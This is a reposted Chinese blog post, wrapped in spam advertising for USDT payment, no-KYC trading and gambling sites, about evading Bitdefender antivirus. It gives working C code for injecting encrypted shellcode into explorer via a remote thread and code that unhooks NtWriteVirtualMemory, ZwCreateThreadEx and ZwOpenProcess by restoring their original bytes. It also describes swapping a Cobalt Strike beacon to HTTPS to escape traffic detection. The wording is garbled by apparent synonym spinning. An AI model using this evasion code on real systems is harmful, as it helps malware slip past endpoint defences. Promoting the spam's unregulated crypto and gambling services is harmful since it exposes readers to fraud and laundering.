USDT自动充值API接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

渗透时,可能会遇到林林总总的的杀软,但每个杀软特征差异,在绕过前,往往都需要剖析,本文就Bitdefender举行剖析

最近在研究若何免杀,写了一个马,火绒 360 乐成绕过(图有点少,那时没存,火绒测试是用的同砚的物理机,两台,另有一台没截图;360是虚拟机)


然后看到Askar大佬的文章,决议试试绕过Bitdenfender,先运行一下,说不定也过了呢(痴心妄想)
效果一运行,连马也给我删了,看看Bitdefender是若何检测的

检查我的exe,通过x64debug去调试:


发现这里竟然多了一个"atcuf64.dll",而且是Bitdefender的,这异常可疑,也许率是来检查我的行为的,很有可能是Hook我的API,这里看一下我的马用到了哪些API

DWORD CeatRemoThread(DWORD pid)
{
    HANDLE hThread;
    DWORD dwOldProtect;
    DWORD dwThreadId;
    int shellcode_size = sizeof(buf);
    char* newBuf;

    decrypt(buf, shellcode_size, (LPVOID*)&newBuf);   //jiemi

    HANDLE hHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
    if (hHandle == NULL)
    {
        printf("openprocessError");
        free(newBuf);
        return FALSE;
    }
    LPVOID Memory = VirtualAllocEx(hHandle, NULL, sizeof(newBuf) + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    SIZE_T dwSize = 0;
    WriteProcessMemory(hHandle, Memory, newBuf, shellcode_size / 3, &dwSize);
    Sleep(3000);
    VirtualProtectEx(hHandle, Memory, shellcode_size / 3, PAGE_EXECUTE, &dwOldProtect);


    HMODULE hNtdll = LoadLibrary(L"ntdll.dll");
    if (hNtdll == NULL)
    {
        printf("[!] LoadNTdll Error,Error is:%d\n", GetLastError());
        return FALSE;
    }
    else
    {
        printf("[*] Load ntdll.dll Successfully!\n");
    }
,ifdef _WIN64
    typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        ULONG CreateThreadFlags,
        SIZE_T ZeroBits,
        SIZE_T StackSize,
        SIZE_T MaximumStackSize,
        LPVOID pUnkown
        );
,else
    typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        BOOL CreateSuspended,
        DWORD dwStackSize,
        DWORD dw1,
        DWORD dw2,
        LPVOID pUnkown
        );
,endif 
    typedef_ZwCreateThreadEx ZwCreateThreadEx = NULL;
    ZwCreateThreadEx = (typedef_ZwCreateThreadEx)::GetProcAddress(hNtdll, "ZwCreateThreadEx");

    if (ZwCreateThreadEx == NULL)
    {
        printf("[!] Get ZwCreateThreadEx Address Error,Error is:%d\n", GetLastError());
        return FALSE;
    }
    else
    {
        printf("[*] Get ZwCreateThreadEx Address Successfully! Address is %x\n", ZwCreateThreadEx);
    }
    HANDLE hRemoteThread = NULL;
    DWORD ZwRet = 0;
    ZwRet = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hHandle,
        (LPTHREAD_START_ROUTINE)Memory, NULL, 0, 0, 0, 0, NULL);

    if (hRemoteThread == NULL)
    {
        printf("[!] Creat RemoteThread Error,Error is:%d\n", GetLastError());
        getchar();
        VirtualFreeEx(hHandle, Memory, 0, MEM_RELEASE);
        CloseHandle(hHandle);
        FreeLibrary(hNtdll);
        return FALSE;
    }

    WaitForSingleObject(hRemoteThread, INFINITE);

    return TRUE;
}

先把杀软喜欢检测的拿出来 VirtualAllocEx WriteProcessMemory ZwCreateThreadEx
这里可以看到我的ZwCreateThreadEx是动态加载的,而且较为底层,先看看WriteProcessMemory,是否被钩住了
使用disa *** WriteProcessMemory找到这个API


跟进去看看,这里是比WriteProcessMemory更为底层的NtWriteVirtualMemory


跟进去看看!


似乎是被钩住了,看看原本NtWriteVirtualMemory的样子


这里证实确实是被Bitdefender的谁人atcuf64.dll钩住了,会发送到这个dll中那里举行检查,监控
这里我希望举行一个unhook的操作,把他E9的4个字节,包罗E9还原成原来的硬编码,原来的硬编码为:
4C 8B D1 B8 3A


这里更新自己的代码,动态获取NtWriteVirtualMemory的地址并unhook

HMODULE hNtdll = LoadLibrary(L"ntdll.dll");
LPVOID NtWriteVirtualMemory_Address = GetProcAddress(hNtdll, "NtWriteVirtualMemory");
printf("[*] NtWriteVirtualMemory address is : %p\n", NtWriteVirtualMemory_Address);
if (WriteProcessMemory(GetCurrentProcess(), NtWriteVirtualMemory_Address, "\x4C\x8B\xD1\xB8\x3A", 5, NULL)) {
printf("[*] NtWriteVirtualMemory unhook done!\n");

当我单步执行到unhook done后,看到NtWriteVirtualMemory确实已经回复,unhook乐成了!

再看VirtualAllocEx 似乎并没有被hook

先放到一边

,

U交所

U交所(www.9cx.net),全球頂尖的USDT場外擔保交易平臺。

,

再看ZwCreateThreadEx,这个底层的函数同样被hook了


同样的,我们unhook,改为原来的硬编码 4C 8B D1 B8 C1
代码新增:

typedef_ZwCreateThreadEx ZwCreateThreadEx = NULL;
    ZwCreateThreadEx = (typedef_ZwCreateThreadEx)::GetProcAddress(hNtdll, "ZwCreateThreadEx");
    if (WriteProcessMemory(GetCurrentProcess(), ZwCreateThreadEx, "\x4C\x8B\xD1\xB8\xC1", 5, NULL)) {
        printf("[*] ZwCreateThreadEx unhooking done!\n");
    }

看看效果


也已经恢复为原来的硬编码
直接运行试试,应该是可以了,然则运行发现照样被阻挡了

很难受,然则我发现这里报的毒已经跟之前的纷歧样了,而且我的马并没有被删!这解释Bitdenfender以为我的exe没有问题,他这里报毒指的是explorer中有cs的马,这属于绕过内存扫描的内容,hook层面已经绕过完成(了吗?)

我一最先以为是动态扫描出我的马,但我发现Bitdefender的反映很快,我想到卡巴斯基,马可以上线也许5秒,事实扫描也需要时间,但为什么这里一瞬间就挂了,我料想是Bitdefender监控到了explorer有特殊的行为,或者什么器械操作了它,一看我挪用的API,openprocess这个API很显著,我料想是不是Bitdefender监控到了我打开过explorer,想到这里我有些激动,一看,果真被挂钩了!


实验unhook,硬编码为4C 8B D1 B8 26
代码:

LPVOID ZwOpenProcess_Address = GetProcAddress(hNtdll, "ZwOpenProcess");

    printf("[*] ZwOpenProcess address is : %p\n", ZwOpenProcess_Address);

    if (WriteProcessMemory(GetCurrentProcess(), ZwOpenProcess_Address, "\x4C\x8B\xD1\xB8\x26", 5, NULL)) {
        printf("[*] ZwOpenProcess unhooking done!\n");
    }

unhook乐成:

再测试发现依然没过,这里有点尴尬,重新回来审阅报毒


我打码的部门是我的ip,英文我也不怎么看的懂,web什么的,他又把ip符号出来,也许是不是内存扫描,是检测到有通讯的流量,应该是防火墙


反向shell是没有问题,问题是cs太过于着名,他的payload很容易就被识别出来

想了一天,自己构建payload确实超出我的能力,晚上的时刻看了下cs另有哪些beacon,突然想到https不是相对于http加倍平安吗,是否可以辅助我们绕过,直接上图,乐成了!

我又重新使用http的beacon的payload测试一下,直接给我杀了

总结一下这几天绕过杀软的心得:
国产的杀软先不说了,卡巴斯基我在剖析的时刻发现他似乎并没有hook API,包罗静态检测这些方面甚至我不用混淆都能过,然则他的动态扫描内存却是异常头疼的,而Bitdenfender是hook API而且监控敏感流量,但运行事后就没扫描内存,种种杀软都有他们各自善于的领域,但不能能每个方面都兼顾。要有更好的效果,就没有好的性能。

Usdt官方交易所声明:该文看法仅代表作者自己,与本平台无关。转载请注明:usdt怎么提现(www.payusdt.vip):bypass Bitdefender
发布评论

分享到:

usdt不用实名交易(www.caibao.it):扮NEW家│节日吃顿团圆饭,添置这些细腻好物给餐桌加分
8 条回复
  1. 欧博备用网址
    欧博备用网址
    (2021-05-19 00:00:22) 1#

    USDT跑分网U担保(www.Uotc.vip),全球頂尖的USDT場外擔保交易平臺。会爆火吗,期待

  2. 登1登2登3代理
    登1登2登3代理
    (2021-06-29 00:05:23) 2#

    足球贴士网www.zq68.vip)是国内最权威的足球赛事报道、预测平台。免费提供赛事直播,免费足球贴士,免费足球推介,免费专家贴士,免费足球推荐,最专业的足球心水网。

    继续更吗

    1. 皇冠官网手机版
      皇冠官网手机版
      (2021-06-29 22:54:35)     

      USDT场外交易平台www.Uotc.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U担保开放usdt otc API接口、支付回调等接口。

      推荐入坑,别犹豫

  3. 新二皇冠最新手机登录
    新二皇冠最新手机登录
    (2021-07-06 00:02:01) 3#

    对此,艺人范玮琪口出狂言「我们的行政院长竟然禁止口罩出口1个月,这是一件多么低俗、没人格的臭流氓行为。我他妈的有听错吗?这个狗官算是个人吗?都什么时候了!王八蛋部会这么泯灭人性!都什么时候了!我希望我听到的这新闻是假消息。」离不开你啦!

    1. 新2备用网址
      新2备用网址
      (2021-07-18 13:41:55)     

      新2代理手机端www.22223388.com)实时更新发布最新最快最有效的新2网址和新2最新网址,包括新2手机网址,新2备用网址,皇冠最新网址,新2足球网址,新2网址大全。

      加油冲,铁粉永相随

  4. 皇冠注册
    皇冠注册
    (2021-07-14 00:07:17) 4#

    U交所(www.9cx.net),全球頂尖的USDT場外擔保交易平臺。来晚了,蹲着看

  5. 皇冠官网手机版
    皇冠官网手机版
    (2021-08-27 01:12:05) 5#

    2022世界杯欧洲区赛关注我好吗

  6. USDT钱包(www.usdt8.vip)
    USDT钱包(www.usdt8.vip)
    (2021-09-13 00:14:10) 6#

    欧博亚洲客户端www.aLLbetgame.us),欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。

    爱了爱了,抱走。

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。